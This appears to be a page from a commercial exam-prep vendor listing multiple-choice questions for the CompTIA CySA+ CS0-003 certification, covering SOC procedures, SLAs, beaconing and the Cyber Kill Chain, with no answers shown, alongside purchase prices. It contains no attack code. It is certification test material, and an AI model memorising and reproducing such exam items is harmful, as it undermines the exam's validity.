A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following is the best way to relay the process information to the junior analyst?

Options:

A.

Ask another team member to demonstrate their process.

B.

Email a link to a website that shows someone demonstrating a similar process.

C.

Let the junior analyst research and develop a process.

D.

Write a step-by-step document on the team wiki outlining the process.

Buy Now
Questions 103

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

Options:

A.

SLA

B.

MOU

C.

NDA

D.

Limitation of liability

Buy Now
Questions 104

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

Options:

A.

Review Of security requirements

B.

Compliance checks

C.

Decomposing the application

D.

Security by design

Buy Now
Questions 105

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

Options:

A.

Beaconing

B.

Cross-site scripting

C.

Buffer overflow

D.

PHP traversal

Buy Now
Questions 106

An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy and firewall rules that were in place were removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain does this describe?

Options:

A.

Delivery

B.

Command and control

C.

Reconnaissance

D.

Weaporization

Buy Now
Questions 107

After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows 11 users have constant issues. Which of the

following did the change management team fail to do?

Options:

A.

Implementation

B.

Testing

C.

Rollback

D.

Validation

Buy Now
Exam Code: CS0-003
Exam Name: CompTIA CyberSecurity Analyst CySA+ Certification Exam
Last Update: Dec 2, 2024
Questions: 367

PDF + Testing Engine

$57.75  $164.99

Testing Engine

$43.75  $124.99
buy now CS0-003 testing engine

PDF (Q&A)

$36.75  $104.99
buy now CS0-003 pdf